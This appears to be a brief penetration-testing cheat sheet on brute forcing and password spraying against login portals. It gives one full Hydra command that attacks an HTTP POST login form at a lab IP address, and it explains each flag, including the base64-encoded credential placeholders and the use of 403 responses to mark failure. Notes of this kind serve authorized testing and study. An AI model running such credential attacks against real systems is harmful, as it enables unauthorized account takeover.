Brute Forcing and Spraying
Common Usernames
Common Passwords
Scrape website for potential passwords
Test uppercase and lowercase
Hydra
Login Portals
Example 1
Capture in Burp
Username and Password converted to base64 upon sending
Error code 403 = failed
hydra -I -vV -f -L users.txt -P passwords.txt 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'
I - ignore restore files
vV - verbose mode
f - stop upon success
L - username list
P - password list
^USER64^ ^PASS64^ - placements for username and password + base64 encode
C=/ - establish session cookies at the URL
F=403 - HTTP 403 means invalid login
Example 2
Other services
Last updated